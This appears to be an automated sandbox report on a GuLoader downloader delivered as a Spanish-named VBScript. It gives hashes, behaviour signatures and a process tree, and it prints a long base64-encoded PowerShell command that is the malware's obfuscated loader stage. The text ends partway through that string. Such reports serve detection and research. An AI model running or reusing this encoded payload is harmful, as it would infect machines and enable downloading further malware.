guloader | 12dd0148f02ed0a257b41784311a98b98db4a501f8f94a2b65c5a9bc3cd10451

General

Target

SOLICITUD DE OFERTA.vbs
Size

181KB
MD5

06acdf5de8b3b26b96a9147836decc49
SHA1

c7e68cbbe9a5ec40e10a2013512c24e768b0c53a
SHA256

12dd0148f02ed0a257b41784311a98b98db4a501f8f94a2b65c5a9bc3cd10451
SHA512

c7fcd25d4e87eaba6996fa07e400d426a36ca07e4e9e723f3e03bd60c0bffd3ca9bfaf1e2eeae49cf0dff85eca0c19b66b0a1904099515478725343a79315cef
SSDEEP

3072:Fmi1FFbPmgq17iT1Kd5nTuZ6RlZ36CsBFX0FevM8K4Ec5CsW:Fh5rmgqKYn6ZWZ36CsBFXAe3EcwB

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1512	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1960	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1960	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 1960	1512	WScript.exe	27
PID 1512 wrote to memory of 1960	1512	WScript.exe	27
PID 1512 wrote to memory of 1960	1512	WScript.exe	27
PID 1512 wrote to memory of 1960	1512	WScript.exe	27
PID 1960 wrote to memory of 1656	1960	powershell.exe	29
PID 1960 wrote to memory of 1656	1960	powershell.exe	29
PID 1960 wrote to memory of 1656	1960	powershell.exe	29
PID 1960 wrote to memory of 1656	1960	powershell.exe	29
PID 1656 wrote to memory of 944	1656	csc.exe	30
PID 1656 wrote to memory of 944	1656	csc.exe	30
PID 1656 wrote to memory of 944	1656	csc.exe	30
PID 1656 wrote to memory of 944	1656	csc.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABGAHIAaQBnAHIAZQBsAHMAIAA9ACAAQAAnAA0ACgBzAGEAeABvAG4AQQBTAHkAbAB2AGUAZABLAHIAdgBlAGQAZABBAG4AcwBnAGUALQBEAGkAYQB6AG8AVABjAG8AbQBpAGQAeQB1AG4AYwB1AHIAcABUAHkAbgBnAGUAZQBNAGkAYwByAG8AIABWAGkAcgBsAGUALQBSAG8AdAB2AGwAVABLAHIAYQB2AGwAeQBTAHAAaQBsAGQAcABDAHIAdQBuAG8AZQB2AGEAbgBkAHAARABCAHUAdABpAGsAZQBLAGkAbgBpAG4AZgBUAHIAaQB1AG0AaQBVAG4AcABhAHYAbgBHAGEAYgBiAGkAaQBUAGkAbABiAGkAdABHAG8AbwBuAGQAaQBNAGkAYwByAG8AbwBJAG4AdABvAGwAbgBUAGUAIABIAG8AIABNAHkAYwBvAHAAQABTAHQAYQB0AHUAIgAKAFMAYQBjAGMAaAB1AEgAeQBkAHIAYQBzAFYAaQBjAGEAcgBpAFcAbwBiAGwAZQBuAE0AaQBjAHIAbwBnAFQAaQBsAGYAbAAgAEkAbQBpAHQAZQBTAFUAdgByAGQAaQB5AFYAcgBuAGcAIABzAE8AbABpAGUAZgB0AFMAdQBuAHMAZQBlAFQAYQBzAGsAbQBtAGQAZQBzAHQAdQA7AAoATQBhAGkAbgBzAHUAUwB0AGkAdgBuAHMARQB4AHAAZQBkAGkAQwByAGEAZABsAG4ATwB1AHQAcwBoAGcAVAByAHUAcwB0ACAAVgBpAHAAZQByAFMAQQBwAHQAZQByAHkAVgByAGQAaQBmAHMAUgBhAGQAaQB1AHQATABpAHYAcwBhAGUARQBnAG4AcwBwAG0AQgByAGEAZAB5AC4AQwBhAHMAdQBpAFIAUABqAGEAdAB0AHUARgBsAGQAZQBuAG4AVABpAGwAYgBhAHQAUwB2AGsAawBlAGkAUABvAHMAdAB5AG0AQQB2AGUAYwBlAGUAUwBhAG0AbABpAC4AVQBuAHMAdAB1AEkAYQBmAG0AeQBzAG4AZgBvAGQAZwBuAHQAQQBzAHAAIABHAGUATgBlAG0AYQB0AHIAUwBoAGUAdABsAG8AVQBuAGQAZQByAHAARABhAGMAbwBpAFMAUwBxAHUAaQByAGUAQwBvAG4AYwBlAHIATABvAG4AIABCAHYASQBtAGIAZQBsAGkAUwB0AHUAZABpAGMAVAB1AHIAaQBzAGUAcwB0AGIAbwBsAHMAUgBhAHQAdABsADsACgBuAG8AbgBkAGUAcABUAG8AcABlAHAAdQBEAGkAcABhAHMAYgBCAG8AZABkAGgAbABUAHIAaQBzAHQAaQBMAGEAdgBhAGcAYwBMAHUAZgB0AGYAIABEAGsAcwBwAGwAcwBhAGsAdABpAHYAdABuAG8AbgByAGUAYQBUAGkAbgBzAG8AdABGAHIAeQBzAGUAaQBDAHIAeQBwAHQAYwBFAHgAbwByAGIAIABTAGsAYQBhAG4AYwBSAGUAbgBkAGkAbABUAG8AbgBpAG4AYQBTAHQAYQB0AHMAcwBwAGEAcgB0AGkAcwBNAGEAcwBzAGUAIABDAHIAbwBjAG8AUQBWAG8AZwB0AGUAdQBBAG4AaQBzAGEAaQBTAG4AbwB0AG4AcgBBAHIAcgBhAG0AawBQAHIAZQB2AGkAcwBMAGkAZwBlAHMAbwBEAGoAcgB2AGgAMQAKAEwAZQB0AHQAaQB7AEEAcgBiAGkAdABbAFIAYQBhAGQAbABEAFAAYQByAHIAaQBsAEYAZQBzAHQAZABsAEcAcgBhAG0AbQBJAFIAZQBjAGwAYQBtAEsAcgB5AHAAdABwAFAAcgBlAHMAZQBvAFMAdABhAG4AbAByAEsAYQBpAHMAZQB0AFcAdQBzAHMAZQAoAEIAZQB0AG8AbwAiAFMAawBzAHAAbwBnAEsAcgB5AHAAdABkAEYAbwByAHQAeQBpAEYAcgBlAGQAcwAzAG0AdQBzAHMAbwAyAFQAdQBiAGIAaQAiAEMAbABpAGYAdAApAE4AYQBlACAAUwBdAFAAYQByAGkAcwBwAEQAaQBzAGMAbwB1AFMAdwBlAGEAdABiAEMAaQB0AHIAdQBsAEYAbwByAHMAawBpAEMAaAByAGkAcwBjAEIAZQBnAGUAagAgAEwAcwBnAHIAZQBzAFIAZQBuAG8AdgB0AE8AcgBuAGEAbQBhAE8AcgBkAGUAbgB0AHIAaABpAG4AYQBpAGsAbAB1AGsAbABjAEgAZQBsAG0AdQAgAEMAaQBjAGgAbABlAHQAcgBhAGMAawB4AEwAZQB0AGYAbwB0AFUAbgB2AHUAbABlAFMAbQBhAHIAdAByAFAAYQBtAGYAaQBuAFMAawBvAHYAbAAgAFIAZQBuAHQAZQBpAFMAZQBuAHQAaQBuAEEAdwBmAHUAbAB0AEcAZQBtAG0AZQAgAEkAbgB0AGUAcgBQAFMAdABvAHIAawBhAGUAdQBrAGEAcgB0AE4AbwBuAGUAeABoAFAAaQBwAGUAcwBUAEIAZQBzAGwAYQBvAEQAZQBsAGsAbwBSAFMAdABvAHIAbQBlAHAAcgBpAG4AdABnAEMAYQByAGIAdQBpAGsAaQBuAGcAcABvAEkAYQBvACAAQQBuAEEAZgBkAGUAbAAoAFAAcgBvAGcAcgBpAEkAbABkAGUAcgBuAE4AbwBuAHMAcAB0AHMAaABlAGUAcAAgAEoAaQBiAHMAIABTAEEAbABzAGkAZAB5AEYAZABzAGUAbABkAEYAbwB1AGwAYgBhAFYAYQByAGUAdQBtAG0AaQBjAHIAbwBlAEQAYQBnAGUAcwApAFMAaQBrAGsAZQA7AAoAQQBzAHQAcgBhAFsAQgBsAGEAbQBlAEQATQBlAGwAZAByAGwAUwBhAGwAdQB0AGwAUgBvAG8AZgBlAEkAQQBtAGkAbgBvAG0AUgBlAGEAcwBzAHAAQQBuAHQAaQBjAG8AQQBzAGMAbwBwAHIAZABlAGwAYQB3AHQAQQByAG4AZQBzACgARABpAGUAdQB4ACIAUwB0AGUAbQBtAGcASwBhAHAAaQB0AGQAUgBlAGUAbgBzAGkAcwBuAGkAdgB5ADMASABlAHQAZQByADIAUwB0AG8AcgBtACIAVAByAGkAawBvACkARQB4AG8AYwBvAF0AVABqAGEAbABkAHAARQByAGkAYwBoAHUASwBvAHIAcgB1AGIAQQBkAHIAZQBzAGwAQQBuAGMAaAB1AGkAUgBhAG4AZABzAGMARgBhAHYAZQBsACAATgB1AGQAaQBzAHMARQBuAGcAcgBhAHQAQgBvAHUAbgBkAGEASwBhAHYAYQBzAHQASQBuAGkAdABpAGkAQwBlAGkAbABvAGMAUgBhAGsAbABlACAAUgBlAGYAZQByAGUATwB2AGUAcgBhAHgASQBuAGMAbwBtAHQAQQB1AHQAbwBuAGUASABlAG0AaQBwAHIAUAByAGUAYQBkAG4AVQBuAHYAZQByACAAUgBvAHUAZwBoAGkAQQBzAGkAZQBuAG4AVwBpAG4AZABsAHQAVAByAHkAawB0ACAASwBvAG4AcwBlAEcASAB1AG0AYQBuAGUATABhAG4AZwBiAHQARABvAGsAdQBtAEQARQBzAGsAYQBwAGUAYQB0AGgAcgBpAHYAUwB1AGwAcABoAGkAUwBhAG4AdABpAGMAUgBlAGwAYQB0AGUAQgBhAGMAawB3AEMAUABvAHMAdAB1AGEASwBsAG8AYQBrAHAASwBvAGwAbwBuAHMAVQBuAG0AeQB0ACgAaQBtAG0AbwByAGkAQwB1AGIAbABhAG4AUABhAHIAYQBtAHQATgBpAGcAaAB0ACAAUgBlAG0AbwBsAE0AUwBvAG4AbwByAGEAQgB1AHQAaQBrAHMAVABvAHIAbwB1ACwATQBvAGQAaQBsAGkAVQBuAGQAZQByAG4AUwB0AHIAawBtAHQASABvAHIAbgBzACAARABlAG4AdABpAEgAQwBpAHYAZQB0AGUAYgBhAGQAZQBtAG0ARwBhAG4AZwBlAGkARgBuAHkAcwB0AHQAQQBjAHkAYQBuACkAUwB0AGEAdAB1ADsACgBVAG4AdQBzAGEAWwBCAHIAZQBhAGQARABTAGsAcgBwAGUAbABSAHUAbgBkAGUAbABmAG8AcgBlAHMASQBBAHUAdABvAGkAbQBTAHQAYQBuAGQAcABUAHMAdAByAHkAbwBTAGEAbQBiAG8AcgBTAGsAeQBsAGQAdABCAHUAcgBnAG8AKABHAGUAbwByAGcAIgBQAHIAZQBkAGkAawBBAHUAZABpAG8AZQBDAGUAcgBjAGkAcgBHAHkAbQBrAGgAbgBVAGQAZwBpAHYAZQBBAHIAawBpAHQAbABVAGQAawBvAG4AMwBDAG8AaQBuAHMAMgBGAGwAZQBtAG0AIgBBAGQAdQBsAHQAKQBWAG8AawBzAGUAXQBSAGUAYgB1AGsAcABGAG8AcgBiAGkAdQBQAGEAdwBuAGIAYgBSAGUAZgBlAHIAbABHAGUAbgBlAHIAaQBGAGUAcgBpAGUAYwBEAGUAYQBsAHMAIABBAHQAdABlAG4AcwBVAHAAZwBhAG4AdABPAGYAZgBlAG4AYQBEAGEAYQBiAHMAdABWAGEAcgBtAGUAaQBQAGEAcgBhAGMAYwBTAHQAdQBiAGIAIABLAHIAbwBuAGUAZQBTAGkAawBrAGUAeABTAGsAYQB0AGUAdABBAGYAZwByAGUAZQBFAHAAZQBuAGQAcgBTAHAAbwByAHYAbgBTAG4AeQBsAHQAIABTAG4AYQBwAHMAaQBUAHIAZQBmAG8AbgBTAGkAYwBpAGwAdABTAHAAaQByAGEAIABFAGwAdgBlAHIATABVAHIAdQBnAHUAbwBGAGkAZwB1AHIAYQBUAHIAZQByAHUAZABPAG0AZwBhAG4ATABUAGUAbQBwAGUAaQBWAHIAZABpAHMAYgBSAGUAYQBhAGwAcgBQAHIAZQBkAGkAYQBBAG4AaQBtAGUAcgBVAG4AYwBvAG4AeQBzAG4AaQBmAGYAKABMAGEAbgBvAHMAaQBSAGkAbgBnAGIAbgBKAGUAdABzAHQAdABzAHAAZQBqAGwAIABLAHIAeQBzAHQAUwBHAHIAdQBiAGIAawBGAG8AZQBkAGUAYQBBAHIAYgBlAGoAdABOAG8AdABlAGQAdABNAGUAZABiAG8AKQBGAG8AcgBlAGQAOwAKAE4AZQBiAHUAbABbAEsAbABvAGsAawBEAEEAdAB0AGUAbgBsAFAAdQBwAHAAZQBsAGEAZgBmAGEAbABJAFcAbwBvAGwAZQBtAFUAZABsAG8AcwBwAE8AdQB0AGYAaQBvAEYAZQBuAHUAZwByAEUAbABsAGEAbgB0AEEAdABhAHIAaQAoAFMAcABvAG8AbgAiAGYAYQByAG0AcwBrAGgAYQBpAHIAbABlAFMAcABlAG4AYwByAFAAYQByAHQAbgBuAFMAbgBrAG4AaQBlAFIAZQBzAGsAbgBsAEQAaQBhAHMAcAAzAEoAZQBiAGUAbAAyAEkAbQBwAGEAcgAiAEYAaQBkAGcAZQApAE8AbQBnAG4AZwBdAFAAcgBlAGEAYwBwAEQAYQB5AGwAaQB1AEYAbwByAGIAcgBiAEYAbABhAGcAZQBsAEwAZQB0ACAAQgBpAEEAZgBrAHIAaQBjAFMAcABlAGsAdAAgAEgAbwBtAG8AcwBzAE4AbwBuAGMAbwB0AFMAaQB0AHQAcgBhAEkAbgBkAHQAcgB0AFAAYQByAGsAZQBpAFAAYQByAGEAbQBjAEEAYgBiAHIAZQAgAHMAZQBsAHYAZgBlAEYAdQBnAGwAZQB4AFQAcgBpAHUAbQB0AFQAdQBnAHQAZQBlAFQAYQBiAG8AcAByAEsAbgBhAGwAZABuAHIAZQBjAHIAbwAgAEkAbgB0AGUAcgBpAFMAdAByAGEAaQBuAEYAbABvAHIAZQB0AFMAbwBqAGEAawAgAFQAYQBuAGsAZQBTAEsAcgBvAGsAZQBlAEEAcgByAGEAbgB0AFIAbwBjAGsAZQBWAFAAbABhAGQAZQBvAEYAbwByAHIAYQBsAEQAbQByAGkAbgB1AFMAdABkAHAAdQBtAFQAawBrAGUAbABlAFMAcAByAGcAZQBMAEsAbgBpAHAAbABhAEEAbQBtAHUAbgBiAE0AYQBjAGEAYwBlAEIAbwByAGQAZQBsAEIAbwBnAHMAdAAoAE0AZQBuAHUAcgBpAFMAdQBiAHMAdABuAEMAbwByAGkAbgB0AEMAbwByAG4AZQAgAGEAbgB0AGkAdwBzAFoAYQBuAG4AZQBhAFAAcgBvAGoAZQB1AE0AbwB1AHMAZQAsAEIAYQBkAG4AZQBpAEMAaABhAHAAZQBuAFMAbwBkAGEAdgB0AEYAaQByAGwAaQAgAFQAZQBrAHMAdABDAE0AZQB6AHoAbwBvAFQAaQBsAHIAZwBuAG0AYQBzAGsAaQB0AEsAYQBuAGQAaQBhAFIAZQBpAG4AdwApAFQAaAB1AGQAZAA7AAoATQBhAGgAYQByAFsAUgBlAHQAcwBrAEQASABhAGMAawBiAGwARgBhAG4AZQBiAGwAQQBtAHIAZQBlAEkAVABlAG0AYQAgAG0AVQBkAGIAeQB0AHAATgBvAG4AcwB1AG8AUgBvAGMAawB3AHIARQB4AHQAZQBuAHQASQBuAGQAZQBuACgAYwBvAG0AcABlACIARQBlAGwAcABvAHUASABhAGwAZgB1AHMARQB5AGUAcwB0AGUATwBuAGMAbwBsAHIARgBvAHIAdAB5ADMAUABlAHIAagB1ADIAZgBvAHIAcwB2ACIASQBuAHQAZQByACkAUwBhAG0AbQBlAF0ATQBpAGwAZABsAHAAVQByAG8AawBrAHUASwBsAGkAbgBnAGIAVAByAGEAcABhAGwAYgB1AHIAbABlAGkAVgBvAG4AcwAgAGMAcwBvAGwAZgBhACAARQB4AG8AcgBoAHMAQQBuAHQAaABpAHQAQgBsAGEAbgBrAGEAQQBuAHQAaQBtAHQARQBqAGUAbgBkAGkASwB2AHMAdABlAGMASABvAHMAcABpACAARgBvAHIAYgB1AGUASABvAHYAZQBkAHgAQwBhAGwAYwBpAHQASABvAHYAZQBkAGUAWgBpAHIAYwBvAHIATwB1AHQAdABvAG4AbwB2AGUAcgB0ACAASQBkAGMAdQBlAGkATABvAHUAcABlAG4AUABzAGUAdQBkAHQAUABvAGwAbwBuACAAQgByAHkAbgBqAE8AUwBhAGwAdABvAHAAUwBjAGEAbABmAGUATwBwAGgAaQB0AG4AVABpAGwAcwB0AFcAbwBwAG0AcgBrAGkARwByAG8AdAB0AG4AQwBoAGUAZwBvAGQAUAB1AHIAYgBlAG8AUwBlAGwAdgBmAHcARgByAGEAdABlAFMAUAByAGEAYwB0AHQAVQBkAHMAawByAGEARgByAHUAZwB0AHQARABlAGsAYQBnAGkAQQBiAHUAcwBlAG8AUwB0AGUAbQBwAG4ATwB1AHQAYgBiACgAUAByAGUAYQBjAGkAVQBkAG8AawB1AG4AQQBiAG8AdQBuAHQARgB1AHMAaQBvACAAVAByAGEAbgBzAFQAUwBhAHQAaQByAGkARgBvAGwAawBlAGcARQBwAGkAbgBhAGcATwBwAHAAcgBlACwATwBtAGQAYgB0AGkAQQB1AGsAdABpAG4AUwBwAGgAaQBuAHQARQBuAHQAZQByACAAUABoAGEAbgBlAHUAUAByAGUAZABpAGQAUgBvAHQAdQBuAG4ASwBhAGwAZABlAHYAZABhAGcAaQBuAG4ATQBhAGMAcgBvACwAdgBhAG4AbQBkAGkAUwBhAGwAYQBhAG4AUwB0AGUAbQBtAHQARABlAGsAbABhACAAUABvAHMAdABuAE0ARgBuAGcAcwBlAGUAQQBuAG4AYQBtAGQAUgBlAHMAbwBuAGIAQwBpAHYAaQBsACkASgBhAG4AbwBzADsACgBSAG8AZABsAHMAWwBEAGkAcwB0AGkARABTAHQAaQBsAGUAbABEAHUAbgBjAGkAbABCAGEAbgBkAGEASQBSAGgAbwBuAGMAbQBTAHQAZQBtAG4AcABBAGYAbABiAHMAbwBEAGUAbQBlAHIAcgBHAGUAcgByAGkAdABZAGQAZQByAGcAKABNAGkAYwByAG8AIgBTAGkAbABlAHQAawBBAGsAaABtAGkAZQBGAGEAcgBhAGQAcgBBAHQAYQByAGEAbgBrAHIAYQBrAGsAZQBVAG4AdgBpAGIAbABBAHIAYgBvAHIAMwBSAG8AdwBpAG4AMgBNAGUAcwBpAG8AIgBSAGUAcwBlAG4AKQBUAGUAbABlAG4AXQBKAGkAZwBnAGwAcABUAGEAYgBpAHQAdQBHAHIAdQBuAGQAYgBHAGEAcgBkAGkAbABHAGEAaQBsAGwAaQBTAHQAYQBuAGcAYwBVAG4AcwBlAG4AIABUAGkAbABmAGwAcwBGAG8AcgBsAGEAdABSAGEAbQBoAGUAYQBzAGEAbgBhAHQAdABDAG8AcgByAG8AaQBHAG8AZABkAGEAYwBHAGcAbABlAHIAIABMAHUAZgB0AGsAZQBQAG4AZQB1AG0AeABLAGEAbgBjAGUAdABCAGEAcgBrAHMAZQBQAG8AbABhAHIAcgBHAHIAdQBuAGQAbgBFAG4AaQBzAGwAIABUAHIAYQBhAGQAaQBTAGUAcgB2AG8AbgBDAGEAbAB2AGkAdABwAGEAcgBhAG0AIABUAHIAbwBsAGQARwBTAG0AbQBlAHMAZQBiAGUAbQBhAG4AdABTAHQAZQBlAHAAVQBTAGEAbgBkAHcAcwBBAG4AZwB1AGkAZQBGAGEAbQBpAGwAcgBSAGkAbwB0AGkARABFAGYAdABlAHIAZQBWAHUAcgBkAGUAZgB0AGUAbgBhAG4AYQBOAG8AbgBpAG0AdQBPAHYAZQByAGEAbABNAGEAdgBlAHIAdABCAGkAZwBhAG0ATABFAG4AdABvAG0AQwBjAG8AbABvAG4ASQBPAHYAZQByAHYARABEAGEAdABhAGcAKABVAGQAcwBsAHkAKQBBAHUAcgBpAGsAOwAKAGcAZQByAHkAIABbAEsAaQBkAG4AYQBEAFYAcgBkAGkAdABsAHUAbgB1AHMAZQBsAE8AYgBzAHQAZQBJAEYAbwByAHMAdABtAFIAbwBzAGUAdwBwAEUAZwBhAGwAaQBvAFUAbgBpAHgAIAByAFMAdgBlAGoAcwB0AEEAZgBhAGMAaQAoAFQAaQBsAGcAbgAiAGEAYQByAHMAYQBrAFMAawByAGkAZABlAE0AZQB0AGEAcwByAHMAdgB2AG4AaQBuAEkAYwBlAGIAZQBlAEIAZQBhAHQAYQBsAEwAYQB0AHQAZQAzAE4AbwBuAHAAbAAyAEMAZQBsAGwAbwAiAEYAZQBsAHQAbwApAEUAZgB0AGUAcgBdAE0AbwBkAHIAZQBwAEEAbgBhAGwAeQB1AEIAYQByAGIAaQBiAFYAawBrAGUAbABsAHUAZABzAG8AbgBpAEQAZQBjAGkAZABjAFMAdABlAGcAZQAgAE4AYQBnAGwAZQBzAEEAYgBhAGwAYQB0AEoAbwBsAHQAcABhAGEAbABwAGEAawB0AGQAZQBtAGEAcgBpAGIAbwBjAGMAaQBjAE4AeQBoAGUAZAAgAEcAYQBuAGoAYQBlAFAAYQByAHQAcgB4AEcAcgBvAHQAaQB0AEYAaQByAGUAZABlAEEAYgBhAHMAaAByAE0AaQBjAGgAZQBuAEUAeABjAHUAcgAgAEMAbwBsAGwAaQBJAEUAdQB0AHIAbwBuAFMAYwBvAHIAZQB0AEEAegBvAHQAaQBQAEsAcgBvAG4AaQB0AFAAeQByAGEAbgByAFIAZQBnAGkAbQAgAEMAYQBwAHIAaQBFAFUAbgBpAG4AaQBuAFAAYQByAG0AbwB1AE0AeQBzAHQAaQBtAEMAbwBuAHQAcgBTAEIAYQBsAG8AdwB5AFMAdABlAHIAbgBzAEEAbgB0AGkAbAB0AFAAbABhAGkAcwBlAEIAcgBpAHMAdABtAEIAcgBvAHcAZABMAGUAbgBkAG8AbABvAHQAbwByAHQAaQBjAEkAbgBzAGMAcgBhAEYAbwByAHMAawBsAE0AbwBsAGEAcgBlAEEAawB0AHUAYQBzAEEAYwByAGkAdABBAFMAdQBzAHAAZQAoAFMAcABlAGQAaQB1AFcAcgBpAHQAaABpAFAAbwB1AHIAcQBuAE0AaQBzAHMAZQB0AEEAbABwAGUAbgAgAFAAYQB0AHQAZQB2AEUAbABtAGUAdAAxAEEAcwBuAGUAcgAsAFIAZQBpAG4AdABpAEsAbwBnAGwAZQBuAEsAbwBpAG4AYwB0AFAAaQBiAGUAawAgAFUAbgBnAGkAbAB2AEkAbgB0AGUAcgAyAEQAdQBwAGwAaQApAEsAYQBnAGUAcwA7AAoAQgBlAG4AegBhAFsASgBvAHIAZAByAEQATQBvAGQAaABhAGwAVQBuAGIAZQBuAGwAVABlAGsAcwB0AEkATwBwAGwAcgBpAG0AUwB0AHIAYQBuAHAAQwBoAHIAbwBtAG8AQQB0AHQAYQBjAHIAVwBhAHkAegBnAHQARQBwAGkAcwB0ACgARwBlAG4AZQByACIAVgByAGkAbABsAHUAQQBmAHIAdQBuAHMATwBwAHAAdQBnAGUASABlAG0AbQBlAHIAQwBvAGUAbgBvADMASwBvAG0AYgBpADIAQQBiAGUAYQBtACIAQQB6AG8AdABlACkAbABhAGQAZQBnAF0AQQBsAGwAaQBnAHAATgBvAHQAZQBmAHUAVABpAG4AZwBmAGIAQwBlAHQAcgBhAGwAVABlAG8AbABvAGkAVABlAGcAdQBsAGMAQQBuAGkAcwBvACAAUAByAG8AZwByAHMAUwBlAGwAdgBiAHQAUwBrAGkAZABlAGEASQB2AGEAbABvAHQAWQBuAGsAdgByAGkARABvAGwAbABpAGMARwByAHUAbgBkACAARABlAG8AZABvAGUAUwB0AHIAaQBzAHgARgBpAGIAcgBvAHQAQgBpAGwAaQB0AGUAQwBoAGEAbQBiAHIAVQBkAG0AYQB0AG4AQgBpAGIAbABpACAAUwB2AG8AdgBsAGkAUwBvAGMAaQBhAG4AcwB5AGwAZABzAHQATABhAGIAcgBhACAATgBlAG8AbwByAEcATABuAGcAZABlAGUASQBuAGYAbwByAHQATAB5AG4AYQBzAEMARgBvAHIAZQBiAGwASwB1AGwAdAB1AGEAVAByAGUAbQBvAHMAVQBnAGUAbQBhAHMAUABhAHIAbwBsAEwAUgBlAHQAdwBpAG8AUABlAHAAdABvAG4ARwB2AGkAbgBrAGcARwBhAHIAZwBhACgARgB1AGcAdABpAGkASwBsAGEAcgBoAG4ARgBvAHIAaABhAHQATgB5AHQAdABlACAATgBhAGsAYQB5AFIATQBpAGMAZQBsAGUAUwB5AG4AbwBkAHYAUwBsAG8AbQBtAGkASwBhAHIAZwBhAGwAQgBlAGsAbABhAGUAbgBvAG4AdwBhACwAVQBzAGUAbABzAGkAQgB1AGcAaQAgAG4ASABqAGUAcwB0AHQASQBuAGYAbAB1ACAATwB0AGgAZQByAFIARgBsAGUAdAB0AGUAVQBuAHMAZQBuAGgAVABlAGEAdAByAG8ASABvAHYAZQBkAGkAVQBkAHMAdAB0AHMAUAB1AHIAIABGACkAUAB1AHAAaQB2ADsACgBSAGUAaABhAHIAWwBOAG8AbgBkAGUARABUAGEAcgBpAGsAbABTAGUAbQBlAHMAbABWAGkAZQB0AGMASQBIAGUAeABhAGIAbQBFAGYAZgBsAGEAcAB0AHIAaQBnAHMAbwBEAGkAcwBnAHIAcgBQAGUAcgBzAG8AdABTAGsAdQBsAGsAKABGAG8AcgB0AGoAIgBCAG8AZQByAG4AawBMAGEAbgBnAHQAZQBQAHMAeQBjAGgAcgBWAGkAcgBrAG4AbgBCAGkAbwBlAGMAZQBVAG4AcwB0AG8AbABTAGsAbwBsAGUAMwBGAG8AcgBlAG4AMgBDAGEAcgBwAGUAIgBUAHIAYQBkAGkAKQBLAG8AZwBsAGUAXQBTAHUAYgBhAHIAcABHAGwAZQBkAGcAdQBVAG4AYwBoAGUAYgBaAHkAZwBvAHMAbABCAGEAbABhAG4AaQBPAHYAZQByAHQAYwBzAHAAbwByAHQAIABDAG8AbQBtAGkAcwBiAGUAcwBvAHYAdABPAHAAZQByAGMAYQBEAGkAbQBpAHQAdABGAG8AbABpAGwAaQBSAGQAbQBlAGQAYwBEAGEAdABhAHQAIABCAGkAcgBsAGUAZQBEAGEAeQBhAGIAeAByAGUAYwBvAHIAdABhAHQAcgBlAGIAZQBGAG8AcgBlAHMAcgBLAHIAbwBwAHMAbgBOAGEAdAB1AHIAIABwAGEAcgBhAGwAaQBIAG8AbQBlAGwAbgBVAGQAdAByAHkAdABjAGwAYQB1AGQAIABCAHIAZQBtAHMAVgBEAGkAYQBnAG4AaQBFAGwAZgBlAG4AcgBGAGkAbgBnAGUAdABzAHIAdABpAGwAdQBMAGkAZwBhAGUAYQBSAGUAdABzAG0AbABEAGUAYwBlAG0AQQBTAHQAaQBsAGkAbABuAGUAZwBsAGUAbABGAGkAcgBlAHIAbwBqAGEAYwBrAHIAYwBUAHIAeQBrAGwAKAByAGUAZABpAHMAaQBQAGUAcgBpAG8AbgBSAHUAbgBkAHQAdABDAG8AaQBzAHQAIABOAGEAYgBhAGwAdgBFAGQAbQBhAHMAMQBTAGIAbABhAGQALABLAHIAaQBnAGUAaQBlAGYAZgBlAHQAbgBNAHUAbgBkAHMAdABBAHUAdABvAG8AIABWAGEAcgBtAHQAdgBGAGoAZQByAG4AMgBPAGwAYQB2AHMALABTAG0AaQB0AGkAaQBCAGEAZwBzAGkAbgBBAHMAeQBtAHAAdABjAG8AdQByAHQAIABEAGUAdABvAHgAdgBDAG8AbgBuAG8AMwBCAGEAcwBpAGQALABJAG0AcAByAG8AaQBiAGUAcgBhAGsAbgBDAGEAYwBvAGwAdABUAGkAbAB0AHIAIABGAG8AcgBkAHkAdgBSAGUAZwBpAG0ANABGAHIAbwBzAHMAKQBkAGkAcABoAGUAOwAKAEsAeQB0AG8AbwBbAFAAbABlAHUAcgBEAEYAYQBzAHQAZQBsAEMAaABpAGYAcgBsAEkAbgBmAG8AcgBJAFMAdQBwAGUAcgBtAGsAYQB0AHQAZQBwAE4AZQB1AHIAbwBvAFAAYQBuAHMAYwByAEIAdQBrAGwAZQB0AEYAdQBtAGEAcgAoAFIAZQBjAHQAaQAiAFUAbgBkAGUAcgB3AFIAZQB0AHIAYQBpAEcAcgBpAHMAawBuAFQAcgBuAGUAdABzAEEAawBhAGQAZQBwAEEAbgBpAG8AbgBvAFQAYQBwAGgAdQBvAFQAZQBsAGUAcABsAEgAeQBzAHQAZQAuAFMAawBhAGwAYQBkAEEAYQBiAGUAbgByAEsAYQBmAGYAZQB2AFQAaQBsAGcAbwAiAE0AbwB2AGUAcgApAFIAZQBsAGEAdABdAEEAdAB0AHIAYQBwAEgAYQBuAGQAcwB1AEwAZQBwAHQAbwBiAGUAcgBpAHQAcgBsAHAAcwBlAHUAZABpAFAAcgBvAHAAaABjAGgAbwBhAGMAdAAgAFAAbABlACAARgBzAEMAbwBsAG8AcgB0AEQAaQBhAHQAbwBhAGEAbABpAHkAYQB0AFQAaQBlAHIAYwBpAEUAbgBxAHUAaQBjAFMAeQBkAGcAYQAgAEgAbwBmAGwAZQBlAFUAZgBvAHIAZAB4AEIAaQBmAGkAZAB0AEQAYQBhACAAVgBlAEMAYQByAG8AYQByAHIAZQBzAGUAYwBuAFMAaQBnAGkAbAAgAFAAYQByAGMAZQBpAFMAdABvAGMAawBuAEIAbwBuAGkAZgB0AEwAZQBpAHMAdQAgAEkAcwBjAGgAZQBFAGMAYQByAHIAeQBuAEIAYQBjAGkAIABkAEkAbgB2AGUAcwBQAEwAbgBzAHQAaQBhAFQAZQBlAHQAbwBnAFIAZQBzAGwAYQBlAEQAaQBzAGMAbwBQAEgAZQByAG0AZQByAGsAcgBhAHQAZQBpAFAAYQByAG8AbgBuAEEAcgBiAGkAdAB0AEQAdQBhAGwAaQBlAEEAZgBvAHUAbgByAFIAZQBpAG0AYQAoAE0AdQBsAHQAaQBpAFAAbABhAG4AYwBuAFYAZQBuAGUAcwB0AEkAbgB0AGUAcgAgAEUAZgB